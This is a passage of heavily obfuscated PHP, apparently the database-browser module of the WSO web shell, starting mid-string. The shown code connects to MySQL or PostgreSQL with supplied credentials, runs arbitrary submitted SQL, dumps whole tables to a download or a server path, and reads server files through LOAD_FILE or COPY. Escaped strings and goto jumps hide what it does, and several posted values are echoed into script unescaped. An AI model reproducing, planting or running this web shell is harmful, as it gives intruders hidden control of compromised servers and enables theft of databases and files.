"\x27\73\xd\xa\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\146\165\156\143\x74\x69\157\156\40\x66\x73\50\x66\51\40\x7b\xd\xa\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\40\x20\40\40\151\146\x28\146\x2e\x73\x71\154\137\142\141\163\145\x2e\166\141\x6c\165\x65\41\x3d\x73\x5f\144\142\x29\x20\173\x20\146\56\157\156\x73\x75\142\x6d\151\x74\40\75\x20\x66\165\156\143\x74\151\x6f\x6e\x28\51\x20\x7b\x7d\73\xd\12\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\40\40\40\x20\40\x20\x20\40\x20\151\x66\50\146\56\x70\x31\x29\40\x66\x2e\160\61\x2e\166\141\154\165\x65\x3d\x27\47\73\xd\12\40\x20\40\40\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\151\146\x28\146\x2e\160\62\51\x20\x66\x2e\160\62\56\166\141\x6c\x75\145\x3d\47\47\x3b\xd\xa\40\40\x20\40\x20\x20\x20\x20\40\40\x20\40\40\40\x20\x20\40\x20\40\40\x69\146\x28\146\56\x70\63\x29\40\146\56\160\63\56\166\x61\x6c\165\x65\x3d\x27\x27\73\xd\xa\x20\40\40\40\x20\40\40\40\x20\x20\40\x20\40\40\40\40\175\15\xa\40\40\40\40\40\x20\40\x20\40\40\40\40\x7d\xd\12\x9\11\x9\x66\x75\x6e\143\x74\151\x6f\156\40\x73\164\x28\x74\x2c\x6c\51\x20\173\15\xa\x9\x9\11\x9\x64\x2e\163\146\x2e\160\61\x2e\x76\x61\154\x75\145\40\75\40\47\163\145\x6c\145\x63\164\47\73\xd\12\11\x9\x9\11\144\x2e\x73\x66\x2e\x70\62\56\166\x61\154\165\145\x20\x3d\x20\x74\x3b\15\xa\40\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\151\146\50\x6c\x20\x26\46\x20\144\56\163\x66\56\160\63\x29\40\x64\x2e\x73\146\x2e\160\x33\56\166\141\x6c\x75\145\40\75\x20\x6c\73\xd\12\11\11\11\11\x64\56\x73\146\56\x73\x75\x62\155\x69\x74\x28\51\73\15\12\11\11\11\x7d\15\12\11\x9\x9\146\165\156\143\164\x69\157\156\x20\x69\163\50\x29\x20\173\xd\xa\11\x9\x9\11\146\157\x72\50\151\x3d\60\x3b\151\x3c\x64\56\x73\146\x2e\145\x6c\145\x6d\x65\x6e\x74\x73\x5b\x27\164\142\x6c\x5b\x5d\x27\135\56\154\x65\156\x67\164\x68\x3b\53\53\x69\x29\xd\xa\x9\x9\11\11\x9\x64\56\163\x66\56\x65\154\x65\155\x65\156\x74\163\133\47\x74\x62\x6c\133\x5d\47\x5d\x5b\x69\135\x2e\x63\150\x65\143\x6b\145\144\40\x3d\x20\x21\x64\x2e\163\x66\56\145\154\x65\155\145\x6e\x74\163\133\47\x74\142\154\133\x5d\x27\135\x5b\151\135\x2e\143\x68\145\143\x6b\x65\144\73\xd\xa\x9\x9\11\x7d\xd\xa\11\x9\x3c\57\x73\143\x72\x69\160\164\x3e"; goto omuNC; omuNC: if (isset($db) && $db->link) { goto wQooQ; v7m0f: if (!empty($_POST["\x73\x71\154\137\x62\x61\x73\x65"])) { goto Rgzyg; MvXdD: if (@$_POST["\160\61"] == "\x71\x75\x65\162\x79" && !empty($_POST["\x70\62"])) { $db->query(@$_POST["\160\x32"]); if ($db->res !== false) { goto p5kAe; FQZVM: while ($item = $db->fetch()) { if (!$title) { goto UHBlV; UHBlV: echo "\x3c\164\162\76"; goto hcvnp; krRoK: $line = 2; goto OQDWZ; hcvnp: foreach ($item as $key => $value) { echo "\74\164\150\76" . $key . "\74\57\164\x68\76"; } goto gYEfe; s133J: $title = true; goto vdCQU; vdCQU: echo "\x3c\57\164\x72\x3e\x3c\x74\x72\76"; goto krRoK; gYEfe: reset($item); goto s133J; OQDWZ: } echo "\74\164\x72\40\x63\x6c\x61\x73\163\x3d\42\x6c" . $line . "\42\x3e"; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "\74\164\x64\76\x3c\151\76\156\165\154\x6c\x3c\x2f\x69\x3e\x3c\57\x74\x64\76"; } else { echo "\74\164\x64\x3e" . nl2br(htmlspecialchars($value)) . "\x3c\57\164\144\x3e"; } } echo "\x3c\57\164\x72\76"; } goto LonsA; c36CC: $line = 1; goto FQZVM; LonsA: echo "\x3c\x2f\164\x61\x62\154\x65\76"; goto zCgso; vhOW_: echo "\x3c\164\141\x62\154\145\40\167\151\144\x74\x68\x3d\x31\x30\60\x25\x20\143\145\x6c\x6c\x73\160\x61\x63\151\x6e\x67\75\x31\x20\x63\x65\x6c\154\160\x61\x64\x64\x69\x6e\147\75\x32\x20\143\154\x61\x73\163\x3d\x6d\141\151\x6e\x20\163\x74\x79\x6c\x65\75\x22\x62\x61\143\x6b\x67\x72\157\165\156\x64\55\x63\157\x6c\x6f\162\x3a\x23\x32\71\x32\71\x32\71\42\x3e"; goto c36CC; p5kAe: $title = false; goto vhOW_; zCgso: } else { echo "\74\x64\x69\x76\76\x3c\x62\76\105\162\162\157\162\72\x3c\x2f\142\x3e\40" . htmlspecialchars($db->error()) . "\x3c\57\x64\151\x76\76"; } } goto f63uD; f63uD: echo "\74\x62\162\x3e\x3c\x2f\x66\157\x72\x6d\x3e\74\x66\157\162\x6d\40\157\x6e\x73\x75\x62\155\151\x74\75\x27\144\56\x73\146\56\160\x31\x2e\x76\141\x6c\165\145\75\x22\161\x75\x65\x72\x79\x22\73\x64\56\163\x66\56\x70\62\56\x76\x61\154\165\145\x3d\x74\x68\151\x73\x2e\161\165\x65\162\171\56\x76\x61\x6c\165\145\73\x64\157\x63\165\155\145\x6e\164\56\163\x66\x2e\x73\x75\x62\155\151\164\50\x29\x3b\x72\145\x74\x75\162\x6e\40\x66\x61\154\x73\x65\73\47\76\x3c\164\x65\x78\x74\x61\x72\x65\141\x20\x6e\141\x6d\145\75\x27\x71\x75\x65\x72\x79\47\x20\163\164\x79\x6c\x65\x3d\x27\167\151\144\164\150\x3a\x31\x30\x30\45\x3b\x68\145\x69\x67\x68\164\x3a\61\x30\60\x70\170\47\76"; goto l03yb; Rgzyg: $db->selectdb($_POST["\x73\161\154\137\x62\x61\163\145"]); goto QW0Ku; uEPKu: if (@$_POST["\x70\x31"] == "\163\145\154\x65\x63\164") { goto mAhBO; IznKf: if ($_POST["\160\63"] > 1) { echo "\40\74\x61\40\150\x72\x65\146\75\x23\40\x6f\156\143\154\x69\143\153\75\47\x73\x74\x28\42" . $_POST["\160\x32"] . "\x22\54\x20" . ($_POST["\x70\x33"] - 1) . "\x29\x27\76\x26\x6c\x74\x3b\x20\120\x72\145\166\74\57\x61\76"; } goto ZoHo3; l2Xna: $pages = ceil($num["\156"] / 30); goto ZYT4s; mAhBO: $_POST["\160\x31"] = "\161\x75\145\x72\171"; goto e_ZJ4; ZYT4s: echo "\74\x73\143\x72\x69\160\x74\x3e\144\x2e\x73\x66\x2e\157\156\163\165\x62\x6d\151\x74\75\146\x75\156\143\164\151\x6f\156\x28\51\173\163\x74\x28\x22" . $_POST["\160\62"] . "\x22\54\40\144\56\163\x66\56\x70\63\x2e\166\141\154\165\x65\51\175\74\x2f\163\x63\x72\x69\160\164\x3e\74\163\160\141\156\x3e" . $_POST["\x70\x32"] . "\74\57\163\160\141\x6e\76\x20\x28{$num["\156"]}\x20\x72\x65\x63\x6f\x72\144\x73\x29\40\120\x61\x67\x65\x20\43\x20\x3c\x69\156\160\x75\164\40\164\171\160\145\x3d\x74\145\170\x74\x20\156\141\x6d\145\x3d\47\160\x33\x27\40\x76\141\154\x75\145\x3d" . (int) $_POST["\160\x33"] . "\x3e"; goto uoZpe; Es7M3: $num = $db->fetch(); goto l2Xna; uoZpe: echo "\40\157\x66\40{$pages}"; goto IznKf; rczWG: $_POST["\x70\x33"]--; goto bhg9h; e_ZJ4: $_POST["\160\63"] = $_POST["\160\x33"] ? $_POST["\160\63"] : 1; goto Lo_J9; nEjUO: echo "\x3c\x62\162\x3e\74\x62\162\76"; goto IQ9di; bhg9h: if ($_POST["\x74\171\160\x65"] == "\160\147\163\161\x6c") { $_POST["\160\x32"] = "\123\x45\114\105\103\124\40\x2a\40\106\122\x4f\x4d\40" . $_POST["\x70\62"] . "\x20\x4c\x49\115\111\124\x20\x33\60\40\x4f\106\x46\x53\105\124\x20" . $_POST["\160\63"] * 30; } else { $_POST["\160\62"] = "\123\x45\x4c\x45\x43\124\40\52\40\x46\x52\117\115\x20\140" . $_POST["\160\62"] . "\x60\40\x4c\x49\115\111\x54\x20" . $_POST["\x70\63"] * 30 . "\x2c\63\x30"; } goto nEjUO; Lo_J9: $db->query("\123\105\x4c\105\103\124\40\x43\117\125\x4e\x54\x28\52\51\x20\141\x73\x20\156\x20\106\122\117\115\x20" . $_POST["\160\x32"]); goto Es7M3; ZoHo3: if ($_POST["\160\x33"] < $pages) { echo "\x20\74\141\x20\150\162\145\146\75\43\x20\x6f\156\143\x6c\x69\x63\153\75\x27\163\x74\50\x22" . $_POST["\x70\x32"] . "\x22\x2c\x20" . ($_POST["\160\x33"] + 1) . "\51\47\x3e\116\x65\170\164\40\46\x67\164\73\74\57\141\76"; } goto rczWG; IQ9di: } goto MvXdD; EHE8j: echo "\x3c\x2f\164\145\170\x74\141\x72\x65\x61\76\74\x62\x72\x2f\x3e\x3c\151\x6e\x70\165\164\x20\x74\x79\x70\145\x3d\163\165\142\x6d\x69\x74\40\166\141\x6c\165\145\75\47\x45\170\x65\143\x75\x74\145\x27\76"; goto epF3V; bDaxO: while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["\163\x71\x6c\137\143\157\165\x6e\164"])) { $n = $db->fetch($db->query("\x53\105\114\x45\x43\x54\x20\103\x4f\125\116\x54\x28\52\x29\x20\141\163\40\156\x20\106\x52\x4f\x4d\40" . $value . '')); } $value = htmlspecialchars($value); echo "\x3c\156\157\x62\162\76\74\x69\156\x70\x75\164\x20\x74\171\x70\x65\75\x27\x63\x68\x65\143\x6b\x62\157\x78\47\x20\156\141\x6d\x65\x3d\47\164\142\154\x5b\135\x27\x20\x76\141\x6c\165\145\75\x27" . $value . "\x27\76\x26\156\x62\x73\x70\73\74\141\40\x68\x72\145\x66\x3d\43\x20\x6f\156\x63\x6c\151\x63\x6b\x3d\42\x73\164\50\47" . $value . "\47\x2c\61\x29\x22\x3e" . $value . "\74\x2f\141\76" . (empty($_POST["\x73\161\x6c\137\143\x6f\x75\x6e\x74"]) ? "\46\x6e\142\x73\160\73" : "\x20\74\x73\155\x61\x6c\x6c\76\x28{$n["\x6e"]}\x29\x3c\57\x73\155\x61\154\x6c\x3e") . "\74\x2f\156\x6f\142\x72\x3e\74\x62\162\76"; } goto M5p5r; l03yb: if (!empty($_POST["\160\x32"]) && $_POST["\x70\x31"] != "\x6c\157\x61\x64\146\x69\x6c\x65") { echo htmlspecialchars($_POST["\x70\x32"]); } goto EHE8j; M5p5r: echo "\x3c\151\156\x70\x75\164\40\164\171\160\x65\x3d\x27\x63\150\x65\143\153\142\x6f\x78\47\40\x6f\156\x63\x6c\x69\143\x6b\75\x27\151\163\x28\51\73\47\x3e\40\74\151\x6e\x70\x75\164\x20\164\171\x70\145\75\x62\165\164\164\157\156\x20\x76\141\154\165\145\x3d\47\x44\165\x6d\x70\47\x20\x6f\x6e\x63\154\x69\143\x6b\x3d\47\x64\157\143\165\155\x65\x6e\x74\56\x73\x66\56\160\62\56\166\141\154\x75\x65\x3d\42\144\157\167\x6e\154\157\x61\144\x22\73\144\157\143\x75\155\145\x6e\164\x2e\163\146\56\x73\x75\x62\x6d\x69\164\50\x29\73\47\x3e\74\142\162\76\x46\151\154\145\x20\x70\x61\164\150\72\x3c\151\156\x70\x75\164\x20\x74\171\x70\145\75\164\145\x78\164\x20\x6e\x61\155\145\x3d\146\x69\x6c\x65\40\166\x61\x6c\x75\x65\x3d\47\x64\165\x6d\160\56\x73\161\154\47\76\x3c\57\164\144\76\x3c\164\x64\40\163\164\x79\154\x65\x3d\x27\142\157\x72\x64\145\x72\55\164\x6f\160\x3a\62\x70\170\40\x73\x6f\154\x69\144\40\x23\x36\x36\66\x3b\x27\76"; goto uEPKu; QW0Ku: echo "\x3c\164\x72\76\74\164\x64\40\x77\151\x64\164\x68\75\61\x20\x73\x74\x79\154\x65\x3d\x27\142\x6f\x72\144\x65\x72\x2d\x74\157\160\x3a\62\160\170\40\x73\157\154\x69\144\x20\43\66\66\x36\73\x27\x3e\x3c\163\x70\x61\x6e\76\x54\x61\142\154\x65\163\x3a\x3c\57\163\x70\x61\x6e\x3e\74\142\162\x3e\x3c\x62\162\x3e"; goto ss2k2; epF3V: echo "\x3c\x2f\164\x64\76\74\x2f\x74\x72\x3e"; goto DdhHe; ss2k2: $tbls_res = $db->listTables(); goto bDaxO; DdhHe: } goto E6Jlf; E6Jlf: echo "\x3c\x2f\164\141\x62\154\145\76\74\57\x66\157\x72\x6d\x3e\x3c\x62\162\x2f\x3e"; goto eqSj_; HfqGV: if (@$_POST["\x70\61"] == "\154\x6f\141\144\146\x69\x6c\145") { $file = $db->loadFile($_POST["\160\62"]); echo "\x3c\x62\162\x2f\x3e\x3c\160\x72\145\x20\x63\154\141\163\x73\75\x6d\154\61\x3e" . htmlspecialchars($file["\146\x69\x6c\x65"]) . "\74\x2f\160\x72\x65\76"; } goto OSIXi; eqSj_: if ($_POST["\164\x79\x70\x65"] == "\155\x79\x73\161\154") { $db->query("\123\x45\x4c\105\103\x54\x20\61\40\106\122\x4f\x4d\x20\155\x79\x73\161\154\x2e\x75\163\x65\x72\x20\127\x48\x45\x52\105\40\143\x6f\156\x63\x61\x74\x28\x60\165\163\145\162\x60\x2c\x20\x27\100\47\x2c\40\140\150\157\163\164\x60\51\x20\75\40\x55\x53\x45\x52\50\x29\40\101\116\x44\40\140\106\x69\154\145\x5f\160\162\x69\166\140\x20\75\40\x27\x79\x27"); if ($db->fetch()) { echo "\74\146\x6f\x72\155\x20\x6f\156\x73\x75\x62\155\x69\164\x3d\47\144\56\163\x66\x2e\160\x31\56\x76\x61\x6c\x75\x65\x3d\x22\154\x6f\141\x64\146\151\154\145\x22\x3b\144\157\x63\x75\x6d\x65\156\164\56\163\x66\56\x70\x32\x2e\166\141\x6c\x75\x65\75\164\150\151\x73\x2e\x66\56\166\141\154\165\145\73\144\x6f\143\x75\155\x65\156\164\56\x73\x66\x2e\x73\165\x62\x6d\151\x74\x28\51\x3b\x72\145\x74\165\x72\156\x20\x66\141\x6c\163\x65\x3b\47\x3e\74\163\160\141\x6e\x3e\x4c\157\x61\144\40\146\151\154\145\74\57\x73\x70\x61\x6e\x3e\40\x3c\151\x6e\160\x75\x74\x20\x20\143\x6c\x61\163\x73\75\47\x74\157\157\x6c\x73\x49\x6e\160\47\40\164\171\x70\145\75\x74\145\x78\164\40\156\x61\155\x65\x3d\x66\76\74\151\x6e\x70\165\164\40\x74\171\160\145\75\163\x75\142\155\x69\x74\40\166\141\x6c\165\x65\x3d\x27\x3e\76\47\x3e\x3c\57\146\x6f\x72\155\x3e"; } } goto HfqGV; wQooQ: echo "\x3c\142\162\x2f\76\74\x74\141\142\154\x65\x20\x77\151\144\x74\150\75\61\x30\x30\x25\40\x63\x65\x6c\x6c\x70\141\x64\x64\151\156\x67\75\62\x20\143\145\x6c\x6c\x73\x70\x61\x63\x69\x6e\x67\x3d\60\x3e"; goto v7m0f; OSIXi: } else { echo htmlspecialchars($db->error()); } goto qgUXu; eZaK7: echo "\xd\12\74\150\61\x3e\x53\x71\154\x20\142\162\157\x77\163\145\162\x3c\57\x68\x31\x3e\x3c\144\151\166\40\143\x6c\141\163\163\75\x63\x6f\156\x74\145\156\164\x3e\15\12\74\x66\x6f\x72\x6d\x20\x6e\x61\155\145\75\47\163\146\x27\x20\155\x65\x74\150\x6f\x64\75\47\160\157\x73\x74\x27\40\x6f\x6e\163\165\x62\x6d\x69\164\75\47\146\163\x28\x74\150\151\163\x29\73\47\76\x3c\164\141\x62\154\145\40\x63\x65\154\x6c\x70\141\x64\144\151\x6e\x67\x3d\47\62\x27\40\143\x65\x6c\154\x73\x70\141\143\151\x6e\x67\x3d\x27\60\47\76\x3c\164\162\x3e\15\12\74\x74\x64\76\x54\171\x70\x65\74\57\164\144\76\x3c\164\144\76\110\157\x73\164\x3c\x2f\164\144\76\x3c\164\144\76\x4c\157\147\x69\x6e\74\57\164\144\x3e\74\x74\x64\76\x50\x61\163\x73\167\x6f\x72\144\74\x2f\164\144\x3e\74\164\x64\76\x44\141\x74\141\142\141\163\145\x3c\57\x74\144\x3e\x3c\164\144\76\74\x2f\164\x64\x3e\x3c\57\x74\x72\x3e\x3c\164\x72\76\xd\xa\x3c\151\156\160\165\164\x20\164\x79\x70\145\x3d\x68\x69\144\144\x65\x6e\x20\156\x61\155\145\75\141\40\x76\x61\x6c\165\145\x3d\123\x71\x6c\x3e\x3c\151\156\x70\165\x74\x20\x74\x79\160\x65\75\150\151\144\144\145\156\x20\156\x61\155\x65\x3d\x70\61\x20\x76\141\154\x75\x65\75\47\x71\165\x65\x72\171\47\76\x3c\x69\x6e\160\165\x74\x20\x74\171\x70\145\x3d\150\151\144\x64\x65\156\x20\156\x61\x6d\x65\75\160\62\40\166\x61\x6c\x75\x65\x3d\47\47\x3e\x3c\151\x6e\160\165\x74\40\x74\171\160\x65\x3d\x68\x69\144\x64\145\156\x20\156\141\155\x65\x3d\x63\40\x76\141\x6c\x75\x65\75\x27" . htmlspecialchars($GLOBALS["\x63\x77\144"]) . "\47\x3e\74\x69\156\x70\165\x74\40\164\x79\x70\145\75\150\x69\x64\144\145\156\x20\156\x61\155\145\x3d\143\150\x61\x72\x73\145\164\40\x76\x61\154\x75\145\75\47" . (isset($_POST["\x63\150\x61\162\163\145\164"]) ? $_POST["\x63\x68\141\x72\x73\x65\164"] : '') . "\x27\76\xd\xa\x3c\x74\x64\76\74\x73\145\154\x65\x63\x74\40\156\x61\155\x65\x3d\47\x74\171\160\145\47\76\74\x6f\160\164\151\157\156\40\x76\141\154\x75\x65\x3d\47\155\171\x73\161\x6c\47\40"; goto XNXvh; L_VIT: if (isset($_POST["\163\x71\x6c\x5f\150\x6f\x73\164"])) { if ($db->connect($_POST["\x73\161\x6c\137\150\x6f\163\164"], $_POST["\x73\161\154\137\x6c\157\x67\151\x6e"], $_POST["\163\161\154\137\x70\x61\x73\x73"], $_POST["\x73\x71\x6c\x5f\142\141\x73\x65"])) { goto zzoGT; zzoGT: switch ($_POST["\143\150\x61\162\163\145\x74"]) { case "\x57\151\x6e\144\x6f\x77\x73\55\61\62\65\61": $db->setCharset("\143\160\x31\x32\x35\x31"); break; case "\x55\124\x46\55\70": $db->setCharset("\x75\x74\146\70"); break; case "\x4b\x4f\111\x38\55\122": $db->setCharset("\153\157\151\70\162"); break; case "\x4b\x4f\x49\70\55\x55": $db->setCharset("\x6b\x6f\151\x38\x75"); break; case "\143\160\70\x36\66": $db->setCharset("\143\160\x38\x36\66"); break; } goto CgrPi; hq4SA: echo "\74\57\x73\x65\x6c\x65\x63\x74\x3e"; goto pJJmI; CgrPi: $db->listDbs(); goto KKbSG; MV0Hw: while ($item = $db->fetch()) { list($key, $value) = each($item); echo "\74\157\160\x74\151\157\x6e\x20\166\141\154\x75\145\75\42" . $value . "\42\40" . ($value == $_POST["\163\x71\154\x5f\x62\141\163\145"] ? "\x73\x65\154\x65\143\x74\145\144" : '') . "\76" . $value . "\74\57\157\x70\164\151\x6f\156\76"; } goto hq4SA; KKbSG: echo "\74\163\145\x6c\145\x63\x74\x20\156\141\x6d\x65\75\163\161\x6c\137\x62\x61\163\x65\x3e\x3c\x6f\x70\x74\151\x6f\x6e\40\166\x61\154\165\145\x3d\x27\47\x3e\74\57\157\x70\x74\151\157\156\76"; goto MV0Hw; pJJmI: } else { echo $tmp; } } else { echo $tmp; } goto Auorx; pXyEP: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "\x6d\x79\163\161\154": if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) { return true; } break; case "\x70\147\x73\x71\154": goto urMgZ; NmhxL: if ($this->link = @pg_connect("\150\x6f\163\164\75{$host[0]}\40\x70\x6f\x72\x74\x3d{$host[1]}\x20\165\x73\x65\x72\75{$user}\x20\x70\x61\163\163\167\x6f\x72\144\75{$pass}\40\x64\x62\x6e\x61\x6d\145\x3d{$dbname}")) { return true; } goto q24c2; q24c2: break; goto pMERe; urMgZ: $host = explode("\x3a", $host); goto dzuNv; dzuNv: if (!$host[1]) { $host[1] = 5432; } goto NmhxL; pMERe: } return false; } function selectdb($db) { switch ($this->type) { case "\155\x79\x73\161\154": if (@mysqli_select_db($this->link, $db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "\155\171\163\161\x6c": return $this->res = @mysqli_query($this->link, $str); break; case "\160\147\x73\x71\x6c": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { goto ndkAm; Ccrqd: return false; goto kFQe3; ndkAm: $res = func_num_args() ? func_get_arg(0) : $this->res; goto uBsjP; uBsjP: switch ($this->type) { case "\x6d\171\x73\161\x6c": return @mysqli_fetch_assoc($res); break; case "\160\x67\163\161\154": return @pg_fetch_assoc($res); break; } goto Ccrqd; kFQe3: } function listDbs() { switch ($this->type) { case "\155\171\163\161\154": return $this->query("\123\x48\117\x57\x20\144\x61\x74\141\x62\141\x73\145\163"); break; case "\160\x67\x73\161\154": return $this->res = $this->query("\x53\105\x4c\x45\x43\x54\x20\x64\141\164\156\141\x6d\x65\40\106\x52\117\115\x20\160\x67\x5f\x64\141\164\141\142\141\163\145\40\x57\110\x45\x52\x45\x20\144\x61\x74\151\163\164\x65\x6d\x70\x6c\141\x74\x65\41\x3d\x27\164\47"); break; } return false; } function listTables() { switch ($this->type) { case "\155\171\163\x71\x6c": return $this->res = $this->query("\x53\x48\117\x57\40\x54\x41\x42\114\x45\x53"); break; case "\x70\x67\163\x71\154": return $this->res = $this->query("\x73\x65\x6c\145\143\x74\x20\x74\141\142\x6c\x65\137\156\141\x6d\145\40\146\x72\157\x6d\x20\151\x6e\x66\157\x72\x6d\141\164\x69\x6f\x6e\x5f\163\x63\x68\x65\155\141\56\164\x61\x62\154\145\x73\x20\x77\150\145\162\x65\40\164\x61\142\x6c\145\x5f\163\143\x68\x65\x6d\141\x20\41\x3d\x20\x27\151\156\146\157\162\x6d\x61\164\x69\x6f\x6e\137\163\143\150\145\x6d\x61\x27\40\101\116\104\40\x74\141\x62\x6c\x65\x5f\x73\143\150\x65\155\x61\x20\x21\75\x20\x27\160\x67\137\x63\141\164\141\x6c\157\x67\47"); break; } return false; } function error() { switch ($this->type) { case "\155\171\163\x71\154": return @mysqli_error(); break; case "\x70\147\163\161\154": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "\155\171\x73\x71\154": if (function_exists("\x6d\171\x73\x71\x6c\54\137\163\145\164\x5f\x63\x68\x61\162\163\x65\164")) { return @mysqli_set_charset($str, $this->link); } else { $this->query("\123\x45\x54\40\x43\110\101\x52\x53\105\124\40" . $str); } break; case "\160\x67\x73\161\x6c": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "\155\171\x73\x71\x6c": return $this->fetch($this->query("\x53\x45\114\x45\x43\124\40\x4c\x4f\x41\104\137\x46\x49\x4c\x45\x28\47" . addslashes($str) . "\47\51\40\141\163\x20\146\x69\154\145")); break; case "\160\x67\x73\161\x6c": goto hIi1_; hIi1_: $this->query("\103\x52\105\x41\124\x45\40\124\101\x42\114\105\x20\167\163\157\x32\50\146\x69\154\x65\x20\x74\x65\170\164\x29\x3b\x43\x4f\x50\131\x20\x77\x73\157\62\x20\106\122\117\x4d\40\x27" . addslashes($str) . "\x27\73\x73\x65\154\145\x63\164\x20\x66\151\x6c\145\x20\146\162\157\155\x20\x77\x73\x6f\x32\x3b"); goto Vq5gq; RFQO1: return array("\x66\151\154\x65" => implode("\12", $r)); goto Xccn3; Vq5gq: $r = array(); goto B2PD8; B2PD8: while ($i = $this->fetch()) { $r[] = $i["\146\x69\154\145"]; } goto ytmal; ytmal: $this->query("\144\162\157\160\x20\x74\x61\x62\154\x65\x20\167\x73\x6f\x32"); goto RFQO1; Xccn3: break; goto hza_Y; hza_Y: } return false; } function dump($table, $fp = false) { switch ($this->type) { case "\155\x79\x73\x71\154": goto A8Rtf; XOdpv: $i = 0; goto nXX1H; dgmAw: if (!$head) { if ($fp) { fwrite($fp, "\x3b\12\12"); } else { echo "\73\xa\12"; } } goto xuWj3; nXX1H: $head = true; goto rdh_q; vLJ0E: $sql = $create[1] . "\73\xa"; goto GZCGH; e85gZ: $this->query("\123\x45\114\105\103\124\40\x2a\40\x46\122\117\x4d\x20\x60" . $table . "\x60"); goto XOdpv; A8Rtf: $res = $this->query("\123\110\117\x57\x20\103\x52\105\x41\x54\105\x20\124\x41\x42\114\105\40\140" . $table . "\x60"); goto WbvCG; rdh_q: while ($item = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = "\73\xa\xa"; } $columns = array(); foreach ($item as $k => $v) { if ($v === null) { $item[$k] = "\116\x55\x4c\x4c"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "\47" . @mysqli_real_escape_string($v) . "\47"; } $columns[] = "\140" . $k . "\x60"; } if ($head) { $sql .= "\111\x4e\123\x45\x52\124\x20\x49\116\124\117\x20\x60" . $table . "\x60\x20\50" . implode("\x2c\40", $columns) . "\51\x20\126\101\114\125\x45\123\40\12\11\50" . implode("\54\x20", $item) . "\x29"; $head = false; } else { $sql .= "\xa\11\x2c\x28" . implode("\x2c\40", $item) . "\x29"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } goto dgmAw; xuWj3: break; goto I2Pib; WbvCG: $create = mysqli_fetch_array($res); goto vLJ0E; GZCGH: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto e85gZ; I2Pib: case "\160\x67\x73\x71\x6c": goto yK1Fh; q4AGJ: break; goto M_aLo; YU12f: while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "\47" . addslashes($v) . "\x27"; $columns[] = $k; } $sql = "\x49\116\x53\x45\122\x54\x20\x49\116\x54\x4f\40" . $table . "\40\50" . implode("\54\40", $columns) . "\51\40\126\x41\x4c\125\105\123\40\50" . implode("\54\40", $item) . "\x29\x3b" . "\12"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } goto q4AGJ; yK1Fh: $this->query("\123\105\x4c\105\x43\x54\40\x2a\x20\106\x52\x4f\x4d\40" . $table); goto YU12f; M_aLo: } return false; } } goto S2jsy; nON0D: wsoHeader(); goto eZaK7; S2jsy: $db = new DbClass($_POST["\x74\171\x70\145"]); goto b5FFe; xAAjI: echo "\76\115\171\x53\x71\x6c\x3c\57\x6f\x70\164\x69\157\x6e\76\x3c\157\160\164\151\x6f\x6e\x20\x76\141\154\165\145\x3d\x27\x70\147\163\x71\x6c\47\x20"; goto WqMW0; b5FFe: if (@$_POST["\160\62"] == "\x64\157\x77\x6e\x6c\157\x61\144") { goto q3uCo; dKSpy: switch ($_POST["\143\150\141\162\163\145\164"]) { case "\x57\151\156\x64\x6f\x77\163\55\x31\62\x35\61": $db->setCharset("\x63\x70\61\x32\x35\x31"); break; case "\x55\124\106\x2d\x38": $db->setCharset("\x75\164\146\x38"); break; case "\113\x4f\111\x38\x2d\122": $db->setCharset("\153\157\x69\x38\x72"); break; case "\x4b\x4f\x49\70\x2d\x55": $db->setCharset("\153\x6f\151\x38\x75"); break; case "\143\160\x38\66\66": $db->setCharset("\x63\x70\x38\x36\66"); break; } goto SW_1d; SW_1d: if (empty($_POST["\x66\x69\154\145"])) { goto UlEph; NKAxm: foreach ($_POST["\164\x62\x6c"] as $v) { $db->dump($v); } goto gTeuJ; UlEph: ob_start("\x6f\142\x5f\147\x7a\x68\141\x6e\144\x6c\x65\x72", 4096); goto wxi0r; wxi0r: header("\x43\x6f\156\164\x65\x6e\x74\55\104\151\163\x70\157\163\151\164\151\157\x6e\72\x20\141\164\164\141\x63\150\x6d\x65\156\164\73\40\146\151\154\145\x6e\x61\155\145\75\x64\x75\x6d\x70\x2e\x73\x71\x6c"); goto JFnky; gTeuJ: exit; goto o3LDH; JFnky: header("\103\x6f\156\164\x65\x6e\164\55\124\x79\160\x65\x3a\40\x74\145\x78\164\57\160\x6c\x61\151\x6e"); goto NKAxm; o3LDH: } elseif ($fp = @fopen($_POST["\x66\x69\x6c\x65"], "\167")) { goto HVjKn; sI6XB: fclose($fp); goto JcIQa; JcIQa: unset($_POST["\160\x32"]); goto eJ6NS; HVjKn: foreach ($_POST["\x74\142\x6c"] as $v) { $db->dump($v, $fp); } goto sI6XB; eJ6NS: } else { die("\x3c\163\x63\x72\151\x70\x74\x3e\x61\x6c\x65\162\164\50\42\x45\x72\x72\157\x72\41\x20\103\x61\x6e\47\x74\x20\x6f\x70\145\156\40\146\151\x6c\145\x22\51\73\x77\x69\x6e\144\x6f\167\56\x68\x69\x73\x74\x6f\162\171\56\142\141\143\x6b\50\x2d\61\51\74\57\163\x63\162\151\160\x74\76"); } goto V4cuJ; q3uCo: $db->connect($_POST["\x73\x71\x6c\x5f\x68\157\163\x74"], $_POST["\163\161\x6c\137\154\x6f\147\151\x6e"], $_POST["\x73\161\x6c\x5f\x70\x61\163\163"], $_POST["\163\x71\x6c\x5f\142\x61\x73\145"]); goto G1BTq; G1BTq: $db->selectdb($_POST["\x73\x71\x6c\x5f\x62\x61\163\x65"]); goto 